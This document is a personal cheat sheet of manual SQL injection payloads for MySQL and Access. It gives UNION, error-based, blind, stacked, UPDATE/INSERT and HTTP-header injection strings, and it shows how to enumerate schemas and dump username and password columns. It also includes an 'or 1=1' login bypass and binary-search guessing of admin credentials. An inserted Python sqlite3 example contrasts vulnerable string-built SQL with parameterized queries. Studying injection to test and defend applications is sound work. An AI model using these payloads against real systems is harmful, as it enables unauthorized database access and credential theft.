SQL Injection Attacks: Manual Statement Notes

========MySQL Database

SQL query statements

- Get database information
    select user(),version(),database(),@@datadir,@@version_compile_os

- Get database names (the unqualified forms only work when the current database is information_schema)
    select schema_name from schemata;
    select schema_name from information_schema.schemata;
    select group_concat(distinct table_schema) from tables;
    select group_concat(distinct table_schema) from information_schema.tables;

- Get table names of a database
    select group_concat(distinct table_name) from information_schema.tables where table_schema='mysql';
    select group_concat(distinct table_name) from information_schema.tables where table_schema=database();

- Get column names
    select group_concat(distinct column_name) from information_schema.columns where table_schema='mysql' and table_name='user';

- Get column contents
    select concat(0x3a,user,0x3a,password,0x3a) from mysql.user;

UNION-based injection

Confirm the injection point (omitted), then determine the number of columns
    union select 
    order by
Find the display (echo) positions
    union select 1,2,3,4,……

Get database information, assuming the display positions are 1 and 2
    union select version(),user(),3%23

Get database names
    union select null,schema_name,null from information_schema.schemata%23
    union select 1,schema_name,3 from information_schema.schemata%23
    union select null,group_concat(schema_name),null from information_schema.schemata%23

Get database tables
    union select null,group_concat(table_name),null from information_schema.tables%23    // all tables in every database
    union select null,group_concat(table_name),null from information_schema.tables where table_schema='zaqtest'%23    // tables of the named database zaqtest
    union select null,group_concat(table_name),null from information_schema.tables where table_schema=database()%23    // tables of the web application's current database

Get the column names of the users table
    union select null,group_concat(column_name),null from information_schema.columns where table_schema=database() and table_name='users'%23

Get column contents
    union select null,concat(0x3a,username,0x3a,password,0x3a),null from zaqtest.users%23

Error-based injection

    and (updatexml(1,concat(0x7e,(select user()),0x7e),1))
    and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)
    and (extractvalue(1,concat(0x7e,(select user()),0x7e)))
    and exp(~(select * from(select user())a))
    (!(select * from (select user())x) - ~0)

Boolean-based blind injection

    and if(mid(user(),1,1),1,0)
    and if(mid(user(),1,1)='r',1,0)
    and (select user() like 'r%' from tables limit 0,1)

Time-based blind injection

    and if(1=1,sleep(3),1)

Stacked queries

    okmmk';update Zaq_member set email=(select user()) WHERE username='okmmk';

UPDATE injection

    update Zaq_member set email='',email=(select user())#' where username = 'okmmk'
    update Zaq_member set email='',email=(select user()) where username = 'okmmk' 1#' where username = 'okmmk' 

INSERT injection

    insert into test(username,password) values('1' and (updatexml(1,concat(0x7e,user(),0x7e),1))and '','234');

HTTP header injection

These HTTP headers are common places for injection points:
    X-Forwarded-For
    Host
    User-agent
    Referer

    X-Forwarded-For:1'and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) and 'A
    insert into Zaq_log(ip,url,referer,ua)values('1'and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) and '','http://127.0.0.1/web_sql/http-sql/index.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0')
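Defensive counterpart to the header-logging INSERT above, added here as an example and not part of the original notes: the string-built INSERT that makes the X-Forwarded-For value part of the SQL text, beside the parameterized form that stores it as plain data. Python's sqlite3 stands in for MySQL (an assumption), and the input is the X-Forwarded-For payload quoted in the notes.

```python
import sqlite3

# Constructed input: the X-Forwarded-For value from the notes above.
XFF_PAYLOAD = "1'and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) and '"


def setup():
    # In-memory sqlite3 database with the same log table layout as the notes.
    conn = sqlite3.connect(":memory:")
    conn.execute("create table Zaq_log(ip text, url text, referer text, ua text)")
    return conn


def log_request_vulnerable(conn, ip, url, referer, ua):
    # Header values are spliced into the SQL string, so quotes in the
    # X-Forwarded-For value change the structure of the statement.
    sql = (
        "insert into Zaq_log(ip,url,referer,ua) "
        f"values('{ip}','{url}','{referer}','{ua}')"
    )
    conn.execute(sql)


def log_request_safe(conn, ip, url, referer, ua):
    # Bound parameters: the driver sends values separately from the SQL
    # text, so the payload can only ever be stored, never executed.
    conn.execute(
        "insert into Zaq_log(ip,url,referer,ua) values(?,?,?,?)",
        (ip, url, referer, ua),
    )


def demo():
    conn = setup()
    results = {}
    try:
        log_request_vulnerable(conn, XFF_PAYLOAD, "/index.php", "", "Mozilla/5.0")
        results["vulnerable"] = "executed"
    except sqlite3.Error as exc:
        # The injected functions were parsed as SQL and rejected by sqlite3;
        # on MySQL the same text would run and leak user() via the error.
        results["vulnerable"] = f"parsed as SQL: {exc}"
    log_request_safe(conn, XFF_PAYLOAD, "/index.php", "", "Mozilla/5.0")
    results["rows"] = conn.execute("select count(*) from Zaq_log").fetchone()[0]
    results["stored_ip"] = conn.execute("select ip from Zaq_log").fetchone()[0]
    return results


if __name__ == "__main__":
    print(demo())
```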

Universal password (login bypass)

    or 1=1    

========ACCESS Database

1. Error messages:

    and exists(select * from MSysAccessObjects)

    and (select count(*) from sysobjects)>0
    and (select count(*) from msysobjects)>0

2. Guess table names:

    and exists(select * from tables) #a normal response means the table exists

3. Guess column names and column contents

(1) Guess the number of columns

    order by 5
    union select 1,2,3,4...

    Then guess the column count: order by 3
    Suppose the count turns out to be 3, then check the display positions: union select 1,2,3

(2) Guess column names

    First guess the column names: 
        and exists(select username from admin) #a normal response means username exists
        and exists(select password from admin) #a normal response means password exists
    Binary search for column length and content:
        Guess the length:
            and (select top 1 len(username) from admin)>30    //error
            and (select top 1 len(username) from admin)<30    //true, continue with binary search
        Guess the content:
            and (select top 1 ascii(mid(username,1,1))>97 from admin)    //true
            and (select top 1 ascii(mid(username,1,1))>114 from admin)    //error    
            This establishes the ASCII code of the first character of the username field in the first record of the admin table.

  • Personal notes, for reference only! (^ * ^)
